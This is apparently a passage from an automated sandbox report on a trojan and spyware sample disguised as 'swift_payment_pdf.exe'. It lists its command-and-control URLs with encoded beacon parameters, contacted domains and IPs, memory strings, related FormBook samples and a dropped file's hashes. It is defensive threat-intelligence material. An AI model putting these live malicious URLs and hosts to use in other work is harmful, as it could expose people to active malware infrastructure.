            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
            http://www.fontbureau.com0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.fontbureau.com/designers80%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.wwfglobal.com0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.cheapdesklamp.shop/9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaL100%Avira URL Cloudmalware
            http://www.tofcomy.xyz/gw8h/0%Avira URL Cloudsafe
            http://www.wwfglobal.com0%VirustotalBrowse
            https://duckduckgo.com/ac/?q=0%VirustotalBrowse
            http://www.wwfglobal.com/awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc=&tDVH=AxaL0%Avira URL Cloudsafe
            http://www.piqia.top/rlze/0%Avira URL Cloudsafe
            http://www.wwfglobal.com/awho/0%Avira URL Cloudsafe
            http://www.cheapdesklamp.shop/9nq7/100%Avira URL Cloudmalware
            http://www.qaronvc.lol/d8kh/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
            http://www.piqia.top/rlze/?LtQxGF=aIyAcRArRtIGvQhfdflYxlfrxIZLeHRFwP1NsuYwxTNgARVeV6obq7xFZv4/a30th0BoYK05fy/0IwAkOE+OBI8+L6UIixinPDwn66JMG/Wbc84G9m2CbnU=&tDVH=AxaL0%Avira URL Cloudsafe
            http://www.alanbeanart.com/jdip/?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaL0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
            http://soft.365jz.com/0%Avira URL Cloudsafe
            https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vR100%Avira URL Cloudmalware
            http://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaL100%Avira URL Cloudmalware
            http://www.sakkal.com00%Avira URL Cloudsafe
            http://www.qaronvc.lol/d8kh/?LtQxGF=Dj9s4sQnIR+vsDnKwlk6Nlhqw7itdOFaW/ig+XnRtKCOHSdW0TDTG1cm2v2szq88ld3O918FFXWQyjmpenJ9MCf4z9ns+SbMecfFG1uyoV1oJcUCPfEdpdE=&tDVH=AxaL0%Avira URL Cloudsafe
            http://www.tofcomy.xyz/gw8h/?LtQxGF=zGt49IFm93SrBWz0hF/Exo3fFaLGg1tTuVJPwAsKzCbkUXUSx9Ko4qRJeqPE/lbiWQNCjazmLjusy2a3r/X1USIwM3t9fhEbscmQM7mJ8GSckJYgF9Mlv0Q=&tDVH=AxaL0%Avira URL Cloudsafe
            http://www.alanbeanart.com/jdip/0%Avira URL Cloudsafe
            http://soft.365jz.com/0%VirustotalBrowse
            http://www.alanbeanart.com/jdip/1%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.qaronvc.lol
            		116.213.43.190
            		truetrueunknown
            www.cheapdesklamp.shop
            		194.195.220.41
            		truetrue
              		unknown
              www.piqia.top
              		172.80.82.186
              		truetrueunknown
              www.tofcomy.xyz
              		162.0.236.122
              		truetrue
                		unknown
                chefmikesrecipes.com
                		23.226.70.194
                		truetrueunknown
                td-ccm-neg-87-45.wixdns.net
                		34.149.87.45
                		truetrueunknown
                alanbeanart.com
                		3.33.130.190
                		truetrueunknown
                enagicwebsystem.com
                		52.1.217.30
                		truetrueunknown
                www.wwfglobal.com
                		unknown
                		unknowntrueunknown
                www.alanbeanart.com
                		unknown
                		unknowntrueunknown
                www.wepayassessments.com
                		unknown
                		unknowntrueunknown
                www.enrich-pet.com
                		unknown
                		unknowntrueunknown
                www.chefmikesrecipes.com
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.cheapdesklamp.shop/9nq7/?LtQxGF=3WbZRu4mrDqEA1Ay7ye2LS4QzFLdLuukgLPU+Ee+5nDYiFfgQ/T3sQVzU9oLEM0lY8+GADXgUVgfoHaw0lWmg2ENHn4ynM4ZVTokb9t9TCHuPL1ipqofA3g=&tDVH=AxaLtrue
                • Avira URL Cloud: malware
                		unknown
                http://www.tofcomy.xyz/gw8h/true
                • Avira URL Cloud: safe
                		unknown
                http://www.piqia.top/rlze/true
                • Avira URL Cloud: safe
                		unknown
                http://www.wwfglobal.com/awho/?LtQxGF=HKpMDSWn02c1DGWlTfaJmDPYGspDHxl4M+sEuBij/TeAVpD3A/HhJ2RP1Yj8RhfHV3diV9uQCX+MCoKzKJx/zvHqsAsi9iTf04+ql3hj2gWbzWPZwBcwMrc=&tDVH=AxaLtrue
                • Avira URL Cloud: safe
                		unknown
                http://www.wwfglobal.com/awho/true
                • Avira URL Cloud: safe
                		unknown
                http://www.cheapdesklamp.shop/9nq7/true
                • Avira URL Cloud: malware
                		unknown
                http://www.qaronvc.lol/d8kh/true
                • Avira URL Cloud: safe
                		unknown
                http://www.piqia.top/rlze/?LtQxGF=aIyAcRArRtIGvQhfdflYxlfrxIZLeHRFwP1NsuYwxTNgARVeV6obq7xFZv4/a30th0BoYK05fy/0IwAkOE+OBI8+L6UIixinPDwn66JMG/Wbc84G9m2CbnU=&tDVH=AxaLtrue
                • Avira URL Cloud: safe
                		unknown
                http://www.alanbeanart.com/jdip/?LtQxGF=W2aYirCPXKJiAM+1zI/AgBHM8/N+99M0G00tOgURX8ZkKPjyDhoW8AacjBkWD6QeLNKPcx0xYFVxMGjx+jrAzlAoi3E+4FlvpErxWC7md5KahWwglUqmq9c=&tDVH=AxaLtrue
                • Avira URL Cloud: safe
                		unknown
                http://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRPczT41Pma1tHEzPhIwEcWnI00ZdIodjuVJj7fI0Qa0rGd4Hyi3029DaEicY=&tDVH=AxaLtrue
                • Avira URL Cloud: malware
                		unknown
                http://www.qaronvc.lol/d8kh/?LtQxGF=Dj9s4sQnIR+vsDnKwlk6Nlhqw7itdOFaW/ig+XnRtKCOHSdW0TDTG1cm2v2szq88ld3O918FFXWQyjmpenJ9MCf4z9ns+SbMecfFG1uyoV1oJcUCPfEdpdE=&tDVH=AxaLtrue
                • Avira URL Cloud: safe
                		unknown
                http://www.tofcomy.xyz/gw8h/?LtQxGF=zGt49IFm93SrBWz0hF/Exo3fFaLGg1tTuVJPwAsKzCbkUXUSx9Ko4qRJeqPE/lbiWQNCjazmLjusy2a3r/X1USIwM3t9fhEbscmQM7mJ8GSckJYgF9Mlv0Q=&tDVH=AxaLtrue
                • Avira URL Cloud: safe
                		unknown
                http://www.alanbeanart.com/jdip/true
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://duckduckgo.com/chrome_newtabexplorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.fontbureau.com/designersGswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.wwfglobal.comAbWHWpocGREf.exe, 00000008.00000002.3556641408.0000000004B56000.00000040.80000000.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/ac/?q=explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://www.fontbureau.com/designers/?swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.founder.com.cn/cn/bTheswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers?swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.tiro.comswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designersswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.goodfont.co.krswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.sajatypeworks.comswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.typography.netDswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.founder.com.cn/cn/cTheswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.galapagosdesign.com/staff/dennis.htmswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.galapagosdesign.com/DPleaseswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fonts.comswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.sandoll.co.krswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.urwpp.deDPleaseswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.zhongyicts.com.cnswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.sakkal.comswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.comswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://soft.365jz.com/explorer.exe, 00000007.00000002.3556356066.0000000005E6A000.00000004.10000000.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3555103381.0000000002F4A000.00000004.00000001.00040000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                https://www.enrich-pet.com/qrvt/?LtQxGF=HKECkscmwzLra6NzkhZq3iBCIkzhkrvRsiPWEPVOhy8HPvsuERt4M3iNy9vRexplorer.exe, 00000007.00000002.3556356066.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000002.3555103381.0000000002A94000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2537070177.000000000CC84000.00000004.80000000.00040000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://www.ecosia.org/newtab/explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.carterandcone.comlswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers/cabarga.htmlNswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.sakkal.com0swift_payment_pdf.exe, 00000000.00000002.1915539193.00000000058A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.founder.com.cn/cnswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers/frere-user.htmlswift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.jiyu-kobo.co.jp/swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers8swift_payment_pdf.exe, 00000000.00000002.1915566100.0000000006F22000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000007.00000002.3557928356.0000000007FFB000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                194.195.220.41
                		www.cheapdesklamp.shopGermany
                		6659NEXINTO-DEtrue
                52.1.217.30
                		enagicwebsystem.comUnited States
                		14618AMAZON-AESUStrue
                34.149.87.45
                		td-ccm-neg-87-45.wixdns.netUnited States
                		2686ATGS-MMD-ASUStrue
                162.0.236.122
                		www.tofcomy.xyzCanada
                		22612NAMECHEAP-NETUStrue
                3.33.130.190
                		alanbeanart.comUnited States
                		8987AMAZONEXPANSIONGBtrue
                116.213.43.190
                		www.qaronvc.lolHong Kong
                		63889CLOUDIVLIMITED-ASCloudIvLimitedHKtrue
                172.80.82.186
                		www.piqia.topUnited States
                		22552ESITEDUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1467534
                Start date and time:2024-07-04 12:33:53 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 10m 3s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name:Run with higher sleep bypass
                Number of analysed new started processes analysed:9
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:swift_payment_pdf.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@7/2@10/7
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 112
                • Number of non-executed functions: 301
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target AbWHWpocGREf.exe, PID 5596 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                06:36:17API Interceptor5034123x Sleep call for process: explorer.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                52.1.217.305RQfsGnhiZ.exeGet hashmaliciousFormBookBrowse
                • www.trulyhealthclub.com/benx/?9rPLx=T12LEng1/pG6kybUlvCISpKapxhZH+cZt/VXzvgAx9gTH0LK4vt0DrkCutoY0RCBpivo&zL0=UzrhjTV8
                34.149.87.45hOe2JrpIAE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.dehamobilya.com/cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb
                Project Execution Order - (PO 546788) (PO 546789).exeGet hashmaliciousFormBookBrowse
                • www.sfumaturedamore.net/45er/?op=K2MPclUpT0JDpb&jzrtSdh=5wac7XqF5C9tO/nu2iKY7UFJ2BpGPyVCoaFtUPotinLFY92r5LCsbso9vos8/jtTwdb8kOP9aA==
                iY.exeGet hashmaliciousFormBookBrowse
                • www.slow-man.com/ss63/?tZUX=+NZTuPPY/oeUIRAuFrVBxY7clWbjoDnyDgHMPE4tMjWGhJuUs1HH/Uo/WPSJAV9Bim89&Unw0O=GTgtavpHB8N4TP4
                hdBLUdo056.exeGet hashmaliciousFormBookBrowse
                • www.ar-robotics.com/8gw5/
                fiY5fTkFKk.rtfGet hashmaliciousFormBookBrowse
                • www.ar-robotics.com/8gw5/
                pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                • www.magnoliahairandco.com/fkxp/
                tEBdYCAxQC.rtfGet hashmaliciousFormBookBrowse
                • www.ar-robotics.com/8gw5/
                Invitation to Tender (ITT) - TED-DRL-2024-024 - Supply PDF.exeGet hashmaliciousFormBookBrowse
                • www.citizens4daniellee.com/38gc/?-ZeHznp=11VPRfYnqOA19NgIQbS33B+HdkvJIujSOwILAFGQAEF0SeNj9OqkcReekQ+de2CnKCCJ&NjopTP=llxdA
                2OdHcYtYOMOepjD.exeGet hashmaliciousFormBookBrowse
                • www.ar-robotics.com/dhra/
                CFV20240600121.exeGet hashmaliciousFormBookBrowse
                • www.magnoliahairandco.com/fkxp/
                162.0.236.122UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exeGet hashmaliciousFormBookBrowse
                • www.techstone.top/d5fo/
                Swift Message.pdf.exeGet hashmaliciousFormBookBrowse
                • www.stayhold.life/cga5/
                Xbkrgp2HX73cvU3.exeGet hashmaliciousFormBookBrowse
                • www.stayhold.life/rrei/
                j6kpIFikdc.exeGet hashmaliciousFormBookBrowse
                • www.stayhold.life/rrei/
                r6WrUcBg7ToYT8S.exeGet hashmaliciousFormBookBrowse
                • www.stayhold.life/rrei/?zP=M1GkfyLvEhBzSyGReOQfM8Jy1J/gOCsDhhYaY/9VVr9CPN3e/Lc38oDMxlMMDi5yTi8Ke0n1XQZnelh/gkCPiyNbnJ2ofs0SQX70xpPn528Eh49zWA==&7Lyt=yVwl4fSP
                1LZvA2cEfV.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • www.shaipin.top/4bud/
                file.exeGet hashmaliciousFormBookBrowse
                • www.stayhold.life/rrei/
                Payment Details- scanslip000002343.exeGet hashmaliciousFormBookBrowse
                • www.shaipin.top/4bud/
                file.exeGet hashmaliciousFormBookBrowse
                • www.stayhold.life/rrei/
                DRAFT DOCS RSHA25491003.exeGet hashmaliciousFormBookBrowse
                • www.shaipin.top/4bud/

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                td-ccm-neg-87-45.wixdns.nethOe2JrpIAE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 34.149.87.45
                Swift_payment_pdf.exeGet hashmaliciousFormBookBrowse
                • 34.149.87.45
                Project Execution Order - (PO 546788) (PO 546789).exeGet hashmaliciousFormBookBrowse
                • 34.149.87.45
                https://www.facnma.orgGet hashmaliciousUnknownBrowse
                • 34.149.87.45
                https://www.onedrive-strabag.com/Get hashmaliciousUnknownBrowse
                • 34.149.87.45
                https://bitbucket.oreaillyauto.com/Get hashmaliciousUnknownBrowse
                • 34.149.87.45
                http://dllavy.wixsite.com/mybt-view/Get hashmaliciousUnknownBrowse
                • 34.149.87.45
                https://peringatanfb772.wixsite.com/mysiteGet hashmaliciousUnknownBrowse
                • 34.149.87.45
                http://trace.usafilesamrenewal.com/analytics/YkZriEv3qM7BWIziU7JcA9c0576GuKdK/clicked?url=https://shopusafiling.com/Get hashmaliciousUnknownBrowse
                • 34.149.87.45
                http://h3200457.wixsite.com/my-site-1/Get hashmaliciousUnknownBrowse
                • 34.149.87.45
                enagicwebsystem.com5RQfsGnhiZ.exeGet hashmaliciousFormBookBrowse
                • 52.1.217.30

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AMAZON-AESUSd54Y7Ql8sO.elfGet hashmaliciousUnknownBrowse
                • 54.32.27.104
                c3GW14f8Ea.elfGet hashmaliciousUnknownBrowse
                • 34.199.87.25
                jxnRJIvUKz.elfGet hashmaliciousMiraiBrowse
                • 54.46.107.56
                5QQrnIBRTm.elfGet hashmaliciousMiraiBrowse
                • 34.229.40.203
                https://url.uk.m.mimecastprotect.com/s/rO3rCG6qJSA66X7FKCV6f?domain=nam.dcv.msGet hashmaliciousHTMLPhisherBrowse
                • 3.216.81.238
                jhpg1LVUrZ.elfGet hashmaliciousMiraiBrowse
                • 54.54.222.210
                https://we.tl/t-dQx6fJKslTGet hashmaliciousUnknownBrowse
                • 44.218.120.49
                https://googie-anaiytics.comGet hashmaliciousUnknownBrowse
                • 44.194.65.105
                https://seismic.com/products/Get hashmaliciousUnknownBrowse
                • 3.216.220.116
                Encrypted Doc-[izO-3902181].pdfGet hashmaliciousHTMLPhisherBrowse
                • 52.22.41.97
                NEXINTO-DEDHL Invoice 20240407.xlsGet hashmaliciousFormBookBrowse
                • 194.163.41.117
                hidakibest.arm4.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 194.233.78.47
                hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 194.233.78.47
                hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 194.233.78.47
                hidakibest.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 194.233.78.47
                hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 194.233.78.47
                hidakibest.ppc.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 194.233.78.47
                hidakibest.x86.elfGet hashmaliciousMirai, GafgytBrowse
                • 194.233.78.47
                FedEx Receipt_53065724643.xlsGet hashmaliciousFormBookBrowse
                • 194.163.41.117
                69Y89zK8T9.elfGet hashmaliciousUnknownBrowse
                • 212.229.189.58
                ATGS-MMD-ASUSeW8ah5TCen.elfGet hashmaliciousUnknownBrowse
                • 33.191.152.127
                63HUYW299f.elfGet hashmaliciousUnknownBrowse
                • 34.63.14.210
                d54Y7Ql8sO.elfGet hashmaliciousUnknownBrowse
                • 32.115.123.197
                c3GW14f8Ea.elfGet hashmaliciousUnknownBrowse
                • 56.183.39.47
                nNNceyj62M.elfGet hashmaliciousUnknownBrowse
                • 62.200.10.82
                1QP92XNATU.elfGet hashmaliciousUnknownBrowse
                • 48.48.21.45
                5No3fHe5eO.elfGet hashmaliciousMiraiBrowse
                • 48.92.238.255
                jxnRJIvUKz.elfGet hashmaliciousMiraiBrowse
                • 57.140.212.21
                5QQrnIBRTm.elfGet hashmaliciousMiraiBrowse
                • 48.30.83.209
                MDE_File_Sample_7c220b40c46436e58ec622d8b81cd5b8965e0ba7.zipGet hashmaliciousUnknownBrowse
                • 34.160.144.191
                NAMECHEAP-NETUShttps://projeclity-f1d3b6.ingress-daribow.ewp.live/wp-content/plugins/mitaclau/pages/region.phpGet hashmaliciousUnknownBrowse
                • 63.250.43.14
                Att00173994.exeGet hashmaliciousFormBookBrowse
                • 162.0.238.43
                AWB#276097479258.pdf.htmlGet hashmaliciousUnknownBrowse
                • 198.54.115.120
                https://urlz.fr/r1TDGet hashmaliciousUnknownBrowse
                • 63.250.43.14
                https://projeclity-f1d3b6.ingress-daribow.ewp.live/wp-content/plugins/mitaclau/pages/region.phpGet hashmaliciousUnknownBrowse
                • 63.250.43.13
                Drawing specification and June PO #07329.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                • 198.54.122.135
                Attendance list.exeGet hashmaliciousFormBookBrowse
                • 199.192.19.19
                8hd98EhtIFcYkb8.exeGet hashmaliciousFormBookBrowse
                • 162.0.238.43
                Drawing specification and June PO #07329.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                • 198.54.122.135
                Project Execution Order - (PO 546788) (PO 546789).exeGet hashmaliciousFormBookBrowse
                • 162.213.255.55

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\swift_payment_pdf.exe.log

                Download File
                Process:C:\Users\user\Desktop\swift_payment_pdf.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1216
                Entropy (8bit):5.34331486778365
                Encrypted:false
                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                Malicious:true
                Reputation:high, very likely benign file
